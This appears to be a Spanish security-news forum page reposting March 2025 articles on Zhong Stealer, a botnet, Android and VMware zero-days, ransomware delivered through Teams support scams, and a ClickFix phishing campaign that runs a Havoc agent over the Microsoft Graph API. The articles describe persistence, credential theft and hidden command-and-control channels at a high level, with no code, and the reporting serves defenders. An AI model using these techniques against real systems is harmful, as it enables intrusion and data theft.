Es una actualización gratuita para cualquiera que ya tuviera una copia del popular juego. La versión original de GTA V ha sido eliminada de las tiendas de PC a favor de la nueva versión ampliada y mejorada del juego, que incluye una copia de la antigua edición Legacy. Tanto el modo historia como el progreso en línea se pueden migrar a la versión más reciente. La actualización incluye mejoras técnicas que debutaron en las consolas, así como algunas funciones de trazado de rayos específicas para PC si se cumplen las especificaciones recomendadas. También hay algunas pequeñas incorporaciones al contenido, como vida salvaje ambiental, desafíos fotográficos, nuevos vehículos y acceso al servicio de suscripción GTA+.

Rockstar Games ha estado mejorando varias entregas de su franquicia GTA a lo largo de los años. Lanzó una trilogía de remasterizaciones para Grand Theft Auto III, GTA: Vice City y GTA: San Andreas, además de proporcionar estas actualizaciones para GTA V y Grand Theft Auto Online. Y si bien los fanáticos de la serie pueden disfrutar de toda la nostalgia, es seguro decir que las expectativas son muy altas para el próximo Grand Theft Auto VI.

Fuente:
Yahoo News
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#32

Noticias Informáticas / Nuevo Zhong Stealer infecta a empresas de tecnología financiera

Marzo 04, 2025, 11:03:34 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Una nueva amenaza de malware llamada Zhong Stealer ha surgido de China y ya se está infiltrando en las empresas a través de un punto de entrada inesperado: los chats de atención al cliente. Este malware que roba información se está infiltrando actualmente en las empresas de tecnología financiera explotando a los agentes de soporte, pero la mayor preocupación es su adaptabilidad.

Zhong Stealer se puede reutilizar fácilmente para atacar a cualquier industria que dependa de equipos de atención al cliente: hotelería, atención médica, comercio minorista y más.

Echemos un vistazo más de cerca a cómo opera este malware.

Cómo funciona Zhong Stealer

Los cibercriminales detrás de Zhong Stealer no se basan en exploits complejos ni en herramientas de piratería de alta tecnología para entrar en las empresas. En cambio, utilizan una estafa que requiere poco esfuerzo, pero es muy eficaz y que se aprovecha de la naturaleza humana: urgencia, confusión y frustración.

Como señalaron los investigadores de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, el ataque se desarrolla según un patrón calculado y repetitivo diseñado para desgastar a los agentes de atención al cliente:

Aparece un nuevo ticket de soporte, pero la cuenta del remitente es nueva y está completamente vacía. No hay historial, ni interacciones pasadas, solo una vaga solicitud de ayuda.

El atacante escribe en un idioma que no funciona, generalmente en chino, lo que dificulta seguir la conversación. Esto agrega un elemento de confusión y hace que la solicitud parezca más urgente.

Se adjunta un archivo ZIP, que supuestamente contiene capturas de pantalla u otros detalles necesarios para la solicitud. El atacante insiste en que el agente de soporte debe abrirlo para comprender el problema.

Si el agente duda, el atacante se frustra cada vez más y lo presiona para que actúe.

Archivos ZIP sospechosos con caracteres chinos

La ejecución de Zhong Stealer en un entorno seguro y aislado, como el sandbox de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, reveló su comportamiento casi de inmediato.

Archivo malicioso analizado dentro del sandbox No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Después de ejecutar el análisis, podemos ver en la esquina superior derecha de la pantalla que el sandbox No tienes permitido ver enlaces. Registrate o Entra a tu cuenta marcó inmediatamente el archivo y sus actividades como maliciosos, resaltándolos en rojo.

Esto permite a los equipos de seguridad reconocer amenazas al instante sin necesidad de conocimientos técnicos profundos: la forma más rápida y sencilla de determinar si un archivo o enlace sospechoso contiene malware.

Actividad maliciosa detectada por el sandbox No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Durante la sesión de análisis, también podemos ver cómo Zhong Stealer descarga componentes adicionales para continuar el ataque:

Zhong Stealer descarga componentes adicionales dentro del sandbox No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Después de todos los preparativos, Zhong Stealer comienza con el robo de credenciales y la exfiltración de datos. Al hacer clic en el comportamiento malicioso dentro del sandbox de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, podemos ver todas las técnicas y tácticas principales utilizadas por Zhong Stealer.

Análisis detallado del comportamiento malicioso dentro del sandbox de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

A partir de este análisis, podemos ver cómo Zhong Stealer mantiene su persistencia en un sistema infectado. Su método principal es agregar una clave de registro para asegurarse de que el malware se ejecute automáticamente cada vez que se inicia el sistema.

Si se elimina la entrada de registro, Zhong tiene un plan de respaldo: utiliza una tarea programada para reiniciarse, lo que dificulta su eliminación total.

Descubren mecanismo de persistencia en un entorno seguro

Una vez que se asegura la persistencia, Zhong cambia su enfoque al objetivo real: recolectar credenciales y datos de extensiones del navegador.

Al apuntar a la información de inicio de sesión almacenada, puede robar datos comerciales y personales confidenciales antes de que la víctima se dé cuenta de que han sido comprometidos.

Zhong Stealer comienza a escanear Edge para robar datos confidenciales

Finalmente, después de robar datos confidenciales, Zhong se conecta a su servidor de comando y control (C2) en Hong Kong para enviar la información robada a los atacantes.

Fuente:
HackRead
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#33

Noticias Informáticas / Los datos de entrenamiento de DeepSeek contienen 12 000 credenciales activas

Marzo 04, 2025, 10:58:30 PM

Los investigadores de seguridad han analizado un conjunto de datos masivo utilizado para entrenar a DeepSeek y otros modelos de IA y han encontrado casi 12.000 credenciales secretas activas, lo que expone sus respectivos servicios.

Los secretos "activos" se refieren a claves API, contraseñas y otras credenciales que se autentican correctamente con sus respectivos servicios.

Truffle Security, una empresa de software de seguridad de código abierto, dijo que encontró la asombrosa cantidad de 11.908 secretos activos en el archivo Common Crawl. Este conjunto de datos de 400 terabytes contiene instantáneas de sitios web de 47,5 millones de hosts en 38,3 millones de dominios registrados y representa una amplia muestra representativa de Internet.

Se encontraron secretos activos en casi tres millones de sitios web, lo que significa que muchos sitios web reutilizan los mismos secretos.

"En un caso extremo, una sola clave API de WalkScore apareció 57.029 veces en 1.871 subdominios", dijo Truffle Security en un informe.

La empresa explica que los desarrolladores exponen secretos al codificarlos en el HTML y Javascript del front-end en páginas web que no controlan. No es culpa de las organizaciones ni de los rastreadores, a quienes no se les debería encomendar la tarea de redactar los datos de rastreo utilizados por los investigadores.

Sin embargo, cuando estos datos son ingeridos por los grandes modelos de lenguaje (LLM), la exposición "probablemente contribuye a que los LLM sugieran secretos codificados".

Los investigadores también destacaron los riesgos de que los modelos de IA entrenados en código inseguro puedan reproducir prácticas inseguras. Por ejemplo, pueden sugerir la codificación de credenciales, poniendo en riesgo a las organizaciones.

"Los LLM populares, incluido DeepSeek, se entrenan en Common Crawl, un conjunto de datos masivo que contiene instantáneas de sitios web. Dada nuestra experiencia al encontrar secretos expuestos en Internet pública, sospechamos que las credenciales codificadas podrían estar presentes en los datos de entrenamiento, lo que podría influir en el comportamiento del modelo", dijeron los investigadores.

Los resultados del modelo se moldean aún más mediante otros conjuntos de datos de entrenamiento, ajustes, técnicas de alineación y contexto de aviso.

La empresa probó previamente 10 LLM y demostró que la mayoría recomienda codificar de forma rígida las claves API y las contraseñas, incluidas herramientas para desarrolladores como VS Code, ChatGPT y otros asistentes de codificación de IA ampliamente utilizados.

"¿El riesgo real? Los programadores inexpertos (y no) podrían seguir este consejo ciegamente, sin darse cuenta de que están introduciendo fallas de seguridad importantes", explicaron los investigadores.

Truffle Security dijo que se comunicaron con los proveedores cuyos usuarios se vieron más afectados por los secretos expuestos y trabajaron con ellos para revocar las claves activas, lo que ayudó a rotar "varios miles de claves".

Entre los 219 tipos distintivos de secretos descubiertos, la filtración más frecuente fueron las claves API de MailChimp, que los atacantes pueden explotar en campañas de phishing, exfiltración de datos y suplantación de marca. Algunos sitios web expusieron claves raíz de AWS y una página web incluía 17 webhooks de Slack activos.

Los investigadores sugieren que los desarrolladores incluyan reglas estrictas en sus mensajes de IA para no sugerir nunca credenciales codificadas ni otros patrones de código inseguros. Los desarrolladores también deberían escanear su código y sitios web públicos en busca de claves expuestas.

Fuente:
CyberNews
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#34

Noticias Informáticas / La botnet Eleven11bot es casi tres veces más grande que estimaciones iniciales

Marzo 04, 2025, 10:55:58 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Las cámaras de seguridad, las grabadoras de vídeo en red y otros dispositivos IoT forman parte de una botnet global recién descubierta que ataca a las telecomunicaciones y los foros en línea.

La Fundación ShadowServer rastrea la botnet Eleven11bot, que fue descubierta por el Equipo de Respuesta a Emergencias (ERT) de Nokia Deepfield el 26 de febrero de 2025. La botnet ya ha infectado 86.400 dispositivos en todo el mundo.

Al 2 de marzo, la mayoría de los dispositivos comprometidos se encuentran en los EE. UU. (casi 25.000), y el Reino Unido ocupa el segundo lugar con casi 11.000 dispositivos infectados.

Eleven11bot, compuesto principalmente por cámaras web y grabadoras de vídeo en red (NVR) comprometidas, ha participado en ataques distribuidos de denegación de servicio (DDoS).

ERT estimó anteriormente que el tamaño de la botnet era de alrededor de 30.000 dispositivos. Incluso entonces, los investigadores dijeron que el tamaño "es excepcional entre las botnets de actores no estatales, lo que la convierte en una de las campañas de botnets DDoS más grandes conocidas observadas desde la invasión de Ucrania en febrero de 2022".

"Eleven11bot se ha dirigido a diversos sectores, incluidos los proveedores de servicios de comunicaciones y la infraestructura de alojamiento de juegos, aprovechando una variedad de vectores de ataque. La intensidad de los ataques ha variado ampliamente, desde unos pocos cientos de miles hasta varios cientos de millones de paquetes por segundo", dijo ERT anteriormente.

Según se informa, algunos ataques contra foros públicos duraron varios días y siguen en curso.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Eleven11bot es capaz de lanzar ataques DDoS volumétricos masivos que superan los cientos de millones de paquetes por segundo a través de ciertos vectores.

Un análisis más profundo de algunas de las direcciones IP que participan en la botnet reveló que el 96% de ellas no eran suplantables y se originaron en dispositivos accesibles genuinos, informa GreyNoise.

Los investigadores advierten que los operadores de botnets apuntan a dispositivos IoT explotando contraseñas débiles y predeterminadas, fuerza bruta y apuntando a marcas específicas de cámaras de seguridad, como VStarcam. Los atacantes escanean en busca de puertos Telnet y SSH expuestos, que a menudo quedan desprotegidos en el hardware IoT.

GreyNoise recomienda a los defensores de la red bloquear el tráfico de IP maliciosas conocidas y monitorear los registros de la red para detectar intentos de inicio de sesión inusuales.

Eleven11bot recibe su nombre por los distintivos banners hexadecimales, como \`head\[...\]1111\` o \`head\[...\]11111111\`, que identifican a los bots en el puerto TCP 17000.

Fuente:
CyberNews
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#35

Noticias Informáticas / Microsoft actualiza el soporte de CPU de Windows 11 para sistemas OEM

Marzo 04, 2025, 10:52:02 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Microsoft actualizó su documento de soporte a mediados de febrero de 2025 para incluir los procesadores Intel compatibles con Windows 11 24H2, incluidos varios procesadores Intel de octava, novena y décima generación excluidos.

Las CPU Intel mencionadas anteriormente se lanzaron hace unos ocho años; sin embargo, muchas de ellas siguen funcionando bien hasta el día de hoy y son compatibles con Windows 11 siempre que sus placas base tengan el requisito TPM 2.0. La empresa afirmó que estos modelos de procesadores cumplen con los requisitos mínimos del sistema para Windows 11. Aparte de eso, también afirmó:

"Las generaciones posteriores y futuras de procesadores que cumplan con los mismos principios se considerarán compatibles, incluso si no se enumeran explícitamente".

Tenga en cuenta que la lista de procesadores Intel compatibles con Windows 11 versión 24H2 está diseñada para los fabricantes de equipos originales que construyen nuevos dispositivos con Windows 11, no para el consumidor medio que utiliza una PC con Windows 11. Por lo tanto, aunque Microsoft no haya restablecido las tres generaciones de Intel en su lista, eso no significa que su sistema se bloqueará o dejará de recibir actualizaciones del sistema. Todo lo que la compañía está diciendo es que los fabricantes ya no deberían usar estos procesadores antiguos para los nuevos sistemas y deberían instalar Windows 11 en ellos.

Sin embargo, Microsoft aún no ha publicado una lista oficial de CPU compatibles para ensambladores de PC no OEM o personalizados. Por lo tanto, si está armando su propia PC con Windows 11 a partir de piezas usadas, su única guía son los Requisitos del sistema de Windows 11 de Microsoft, que requieren una CPU de 1 GHz o más rápida con dos o más núcleos. Sin embargo, también lo dirige a la misma página a la que se refieren los OEM cuando arman una nueva PC para obtener su lista de CPU aprobadas, por lo que probablemente significa que también está limitado a chips Intel de octava generación o más nuevos.

A pesar de limitar su último sistema operativo a estos procesadores, aún puede instalar Windows 11 en hardware no compatible modificando algunos valores del registro. Es posible que no obtenga actualizaciones del sistema y de seguridad, por lo que tendrás que hacerlo bajo su propio riesgo. Alternativamente, puede seguir usando Windows 10, pero debe desembolsar $30 al año para actualizaciones de seguridad continuas que te mantengan a salvo de los riesgos en línea en constante evolución.

Fuente:
Tom´s Hardware
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#36

Noticias Informáticas / Estafador que se hace pasar por Elon Musk premia a un "afortunado usuario"

Marzo 04, 2025, 10:48:07 PM

Para celebrar la caída de DOGECoin, Elon Musk, en asociación con Donald Trump, está regalando a los usuarios afortunados 50 Bitcoin (3,7 millones de dólares). Bueno, esto no es cierto, ya que es simplemente una estafa para defraudar a las víctimas desafortunadas.

"¡Oh, hombre, estoy tan feliz de que Elon me haya contactado directamente con una oferta tan increíble! ¡Por fin puedo jubilarme!", dijo un usuario de Facebook después de ser contactado por alguien que se hizo pasar por Elon Musk.

Roberto Bertini Renzetti recibió un mensaje de texto a las 11:43 a.m. en el que se le decía que había sido seleccionado al azar para recibir 50 BTC, lo que se traduce en aproximadamente 3,7 millones de dólares estadounidenses, una cantidad de dinero que cambia la vida de algunos.

El mensaje decía que Renzetti había recibido estos fondos "en celebración del lanzamiento de DOGECoin", una moneda meme supuestamente vinculada al Departamento de Eficiencia Gubernamental, que dirige Musk.

El remitente afirma que esta DOGECoin está "respaldada en asociación con el presidente [Donald Trump] y el equipo SpaceX de Elon Musk".

Renezetti solo necesita contactar a Elon Musk directamente a través de un correo electrónico que escribe mal el nombre de la empresa de Musk (Tesa en lugar de Tesla).

El mensaje termina: "Saludos cordiales y buena suerte. Elon Musk y equipo".

Es increíblemente descabellado pensar que Musk contactó directamente a Renzetti y le otorgó millones de dólares, y los usuarios detectan las señales de alerta inmediatamente.

En primer lugar, los comentaristas notaron el error ortográfico de Tesla en la dirección de correo electrónico, lo que suele ser una señal de que la dirección es ilegítima.

Este mensaje es claramente una estafa de "smishing" (phishing por SMS), un tipo de fraude en el que los estafadores se hacen pasar por una organización o un individuo conocido (como Elon Musk) para extraer información confidencial de la víctima.

Si Renezetti hubiera sido imprudente con este esquema y hubiera hecho clic en el enlace a la dirección de correo electrónico falsa de Tesla, el estafador probablemente le habría pedido a la víctima la dirección de su billetera de criptomonedas o las claves de la billetera para "completar" la transacción.

Los estafadores probablemente usarían esta información para vaciar las billeteras de criptomonedas de la persona.

Como mencionó un usuario de Facebook:

"Parece legítimo. No hay razón para no darles las claves de tu billetera", dijo sarcásticamente.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Alternativamente, al hacer clic en el enlace, la víctima es transferida a un sitio web malicioso donde se roba su información personal, como es común en las estafas de smishing.

Fuente:
CyberNews
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#37

Noticias Informáticas / Google corrige vulnerabilidad de día cero en Android

Marzo 04, 2025, 03:46:43 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Google ha publicado parches para 43 vulnerabilidades en la actualización de seguridad de Android de marzo de 2025, incluidas dos vulnerabilidades de día cero explotadas en ataques dirigidos.

Las autoridades serbias han utilizado una de las vulnerabilidades de día cero, una vulnerabilidad de seguridad de divulgación de información de alta gravedad ( CVE-2024-50302 ) en el controlador del núcleo de Linux para dispositivos de interfaz humana, para desbloquear dispositivos confiscados.

Según se informa, la falla fue explotada como parte de una cadena de exploits de día cero de Android desarrollada por la empresa israelí de análisis forense digital Cellebrite para desbloquear dispositivos confiscados.

La cadena de exploits, que también incluye una vulnerabilidad de día cero de clase de video USB ( CVE-2024-53104 ) parcheada el mes pasado y una vulnerabilidad de día cero de controlador de sonido USB ALSA), fue encontrada por el Laboratorio de Seguridad de Amnistía Internacional a mediados de 2024 mientras analizaba los registros encontrados en un dispositivo desbloqueado por las autoridades serbias.

La semana pasada, Google declaró que habían compartido correcciones para estas fallas con sus socios OEM en enero.

"Sabíamos de estas vulnerabilidades y del riesgo de explotación antes de estos informes y desarrollamos rápidamente correcciones para Android. Las correcciones se compartieron con los socios OEM en un aviso para socios el 18 de enero", dijo un portavoz de Google.

El segundo día cero corregido este mes ( CVE-2024-43093 ) es una vulnerabilidad de escalada de privilegios del marco de Android que permite a los atacantes locales acceder a directorios confidenciales debido a una normalización de Unicode incorrecta al explotar una omisión del filtro de ruta de archivo sin privilegios de ejecución adicionales o interacción del usuario.

Las actualizaciones de seguridad de Android de este mes también abordan 11 vulnerabilidades que pueden permitir a los atacantes obtener ejecución remota de código en dispositivos vulnerables.

Google ha publicado dos conjuntos de parches de seguridad, los niveles de parche de seguridad 2025-03-01 y 2025-03-01. El último viene con todas las correcciones del primer lote y parches para subcomponentes de kernel y de terceros de código cerrado, que pueden no aplicarse a todos los dispositivos Android.

Los dispositivos Google Pixel reciben las actualizaciones de inmediato, mientras que otros proveedores a menudo tardan más en probar y ajustar los parches de seguridad para sus configuraciones de hardware.

Los fabricantes también pueden priorizar el conjunto de parches anterior para actualizaciones más rápidas, lo que no necesariamente indica un mayor riesgo de explotación.

En noviembre, la compañía parcheó otro día cero de Android ( CVE-2024-43047 ), que fue etiquetado por primera vez como explotado por Google Project Zero en octubre de 2024 y utilizado por el gobierno serbio en ataques de software espía NoviSpy dirigidos a dispositivos Android de activistas, periodistas y manifestantes.

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#38

Noticias Informáticas / Broadcom corrige tres vulnerabilidades de día cero de VMware

Marzo 04, 2025, 03:43:56 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Broadcom ha advertido hoy a sus clientes sobre tres vulnerabilidades de día cero de VMware, etiquetadas como explotadas en ataques y reportadas por el Centro de Inteligencia de Amenazas de Microsoft.

Las vulnerabilidades ( CVE-2025-22224, CVE-2025-22225 y CVE-2025-22226 ) afectan a los productos VMware ESX, incluidos VMware ESXi, vSphere, Workstation, Fusion, Cloud Foundation y Telco Cloud Platform.

Los atacantes con privilegios de administrador o acceso raíz pueden encadenar estas fallas para escapar del entorno protegido de la máquina virtual.

"Esta es una situación en la que un atacante que ya ha comprometido el sistema operativo invitado de una máquina virtual y ha obtenido acceso privilegiado (administrador o raíz) podría entrar en el propio hipervisor", explicó hoy la empresa. "Broadcom tiene información que sugiere que la explotación de estos problemas ha ocurrido 'en la naturaleza'".

Broadcom afirma que CVE-2025-22224 es una vulnerabilidad de desbordamiento de pila de VCMI de gravedad crítica que permite a los atacantes locales con privilegios administrativos en la máquina virtual de destino ejecutar código como el proceso VMX que se ejecuta en el host.

CVE-2025-22225 es una vulnerabilidad de escritura arbitraria de ESXi que permite que el proceso VMX active escrituras arbitrarias en el kernel, lo que lleva a un escape de la zona protegida, mientras que CVE-2025-22226 se describe como una falla de divulgación de información de HGFS que permite a los actores de amenazas con permisos de administrador filtrar memoria del proceso VMX.

Las vulnerabilidades de VMware suelen ser el objetivo de los ataques de bandas de ransomware y grupos de piratas informáticos patrocinados por el estado porque se utilizan comúnmente en operaciones empresariales para almacenar o transferir datos corporativos confidenciales.

Más recientemente, Broadcom advirtió en noviembre que los atacantes estaban explotando activamente dos vulnerabilidades de VMware vCenter Server que se parchearon en septiembre. Una permite la escalada de privilegios a la raíz ( CVE-2024-38813 ), mientras que la otra es una falla crítica de ejecución remota de código ( CVE-2024-38812 ) informada durante el concurso de piratería Matrix Cup 2024 de China.

En enero de 20204, Broadcom también reveló que los piratas informáticos estatales chinos habían explotado una vulnerabilidad crítica de vCenter Server ( CVE-2023-34048 ) como día cero desde al menos finales de 2021 para implementar puertas traseras VirtualPita y VirtualPie en hosts ESXi vulnerables.

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#39

Noticias Informáticas / Llamadas falsas de soporte técnico engañan a usuarios de Microsoft Teams

Marzo 03, 2025, 06:44:41 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Los investigadores de ciberseguridad de Trend Micro advierten sobre una nueva estafa en la que los cibercriminales se hacen pasar por personal de soporte técnico para obtener acceso a las computadoras de las víctimas. Pero no se trata de otro esquema de correo electrónico no deseado; los atacantes inundan las bandejas de entrada e incluso se comunican a través de Microsoft Teams para engañar a las personas para que les dejen entrar. Una vez dentro, implementan ransomware de grupos como Black Basta y Cactus.

Así es como funciona:

Las víctimas primero son bombardeadas con una avalancha de correos electrónicos. Poco después, alguien que dice ser del departamento de TI se comunica con ellas a través de Microsoft Teams o incluso una llamada telefónica. Este "ayudante" convence al usuario para que le conceda acceso remoto a su computadora, a menudo utilizando un programa legítimo llamado Quick Assist, que está integrado en Windows para permitir el soporte técnico remoto.

Una vez dentro, el estafador descarga archivos que parecen inofensivos al principio, pero se combinan y descomprimen en secreto para instalar una puerta trasera llamada BackConnect. Oculta en OneDrive, esta puerta trasera les da a los atacantes control total sobre el sistema infectado.

Según el informe técnico de Trend Micro, los incidentes recientes analizados por la empresa muestran una fuerte conexión entre este malware BackConnect y el notorio grupo de ransomware Black Basta, que supuestamente ganó más de 100 millones de dólares gracias a las víctimas en 2023. Incluso hay evidencia que sugiere que algunos miembros de Black Basta se han pasado a otra banda de ransomware llamada Cactus, ya que los métodos utilizados en los recientes ataques de Cactus son sorprendentemente similares.

Estos ataques han sido particularmente activos desde octubre de 2024, afectando principalmente a organizaciones en América del Norte, siendo Estados Unidos el que más ha sufrido. El sector manufacturero, seguido de las finanzas, la consultoría de inversiones y el sector inmobiliario, han sido objetivos frecuentes de Black Basta.

En algunos casos, después de establecer su puerta trasera, se ha visto a los atacantes utilizar métodos más avanzados para propagarse a través de una red, incluso apuntando a sistemas especializados como hosts ESXi utilizados para ejecutar máquinas virtuales. Utilizan herramientas como WinSCP para mover archivos y se les ha descubierto preparándose para cifrar archivos antes de ser detenidos. Los chats internos filtrados de Black Basta revelan que el grupo ve las herramientas de seguridad como Trend Micro como un obstáculo importante, lo que demuestra que están tratando activamente de encontrar formas de sortearlas.

Lo que hace que estos ataques sean efectivos no es necesariamente la complejidad del software utilizado, sino la forma en que los atacantes manipulan a las personas. Al mezclar la ingeniería social con el abuso de software genuino y servicios en la nube, hacen que sus acciones maliciosas parezcan una actividad informática normal. Esto pone de relieve que la ciberseguridad no se trata solo de tener el software adecuado, sino también de estar al tanto de cómo los delincuentes intentan engañar a las personas.

Fuente:
HackRead
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#40

Noticias Informáticas / Campaña de malware explota la API Graph de Microsoft para infectar Windows

Marzo 03, 2025, 06:43:03 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Una nueva campaña de ciberataque descubierta por FortiGuard Labs, la unidad de inteligencia e investigación de amenazas de Fortinet, aprovecha una combinación de ingeniería social, malware de múltiples etapas y la manipulación de servicios de nube confiables para lograr el control sobre los sistemas comprometidos.

Según la investigación de FortiGuard, la campaña se dirige a los usuarios de Microsoft Windows y tiene un alto nivel de gravedad. Su observación más crucial es que los atacantes han innovado al integrar una versión modificada del marco Havoc, Havoc Demon Agent, con la API Microsoft Graph, ocultando eficazmente sus comunicaciones maliciosas dentro del tráfico legítimo de servicios de nube conocidos.

Para su información, Havoc es un marco de comando y control de post-explotación de código abierto utilizado en ejercicios de equipos rojos y campañas de ataque para obtener el control total del sistema objetivo.

El punto de entrada inicial para este ataque es un correo electrónico de phishing cuidadosamente elaborado, que contiene un archivo adjunto HTML diseñado para engañar al destinatario para que ejecute un comando PowerShell malicioso.

Mediante una técnica conocida como "ClickFix", en la que se engaña a los usuarios para que ejecuten comandos maliciosos, el archivo adjunto presenta un mensaje de error falso, que solicita al destinatario que copie y pegue un comando aparentemente inofensivo en la terminal de su sistema. Sin embargo, este comando inicia una cadena de eventos que conduce a la descarga/ejecución de más scripts maliciosos, que se alojan estratégicamente en un sitio de SharePoint, probablemente para ocultar la operación maliciosa dentro de un entorno de nube confiable.

El script de PowerShell inicial realiza comprobaciones para evadir la detección de sandbox y luego procede a descargar/ejecutar un script de Python, también alojado en SharePoint. Este script de Python actúa como un cargador de shellcode e inyecta y ejecuta una DLL maliciosa, KaynLdr, que carga de forma reflexiva una DLL incrustada y complica aún más el análisis mediante el uso de hash de API.

El núcleo de la infraestructura C2 del atacante se basa en la versión modificada de la DLL Havoc Demon, ya que aprovecha la API de Microsoft Graph para establecer canales de comunicación que se combinan a la perfección con el tráfico legítimo de la nube. La función "SharePointC2Init" dentro de la DLL obtiene tokens de acceso para la API de Microsoft Graph y crea dos archivos dentro de la biblioteca de documentos de SharePoint de la víctima, cada uno nombrado con un identificador único derivado del sistema comprometido.

Estos archivos actúan como canales para transmitir información de la víctima y recibir comandos C2, mientras que toda la comunicación es manejada por la función modificada "TransportSend" y cifrada usando AES-256 en modo CTR. Luego, el agente analiza y ejecuta estos comandos, que incluyen una amplia gama de capacidades posteriores a la explotación, como recopilación de información, operaciones de archivos y manipulación de tokens.

El descubrimiento de FortiGuard Labs destaca la evolución de los marcos C2 de código abierto para crear nuevos ataques difíciles de detectar y la creciente necesidad de adoptar medidas de seguridad avanzadas contra dichos ataques.

"Además de mantenerse alerta ante los correos electrónicos de phishing, los mensajes guiados que alientan a abrir una terminal o PowerShell deben manejarse con especial precaución para evitar la descarga y ejecución inadvertida de comandos maliciosos", concluyeron los investigadores de FortiGuard.

Flujo del Ataque:

En un comentario, Thomas Richards, consultor principal y director de prácticas de redes y equipos rojos de Black Duck, un proveedor de seguridad de aplicaciones con sede en Burlington, Massachusetts, señaló que los piratas informáticos están utilizando servicios confiables de Microsoft para evadir la detección, lo que demuestra un alto nivel de sofisticación, pero lo que se destaca es que su método de ataque requiere más acción manual de la víctima de lo habitual.

"Estos grupos de actores maliciosos buscan la ofuscación para poder lograr sus objetivos. No es inusual verlos usar marcos de código abierto, sin embargo, el uso de servicios legítimos de Microsoft muestra un nivel de sofisticación que es preocupante. El uso de esos servicios les permite ocultarse a simple vista y tener los beneficios de ser servidores confiables", explicó Thomas. "Lo sorprendente de esto es el nivel de intervención manual necesario en la víctima para que el ataque sea un éxito. Por lo general, con estas campañas, los actores maliciosos quieren la menor interacción posible por parte de la víctima, aparte de hacer clic en un enlace".

Fuente:
HackRead
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Páginas1 2 3 ... 68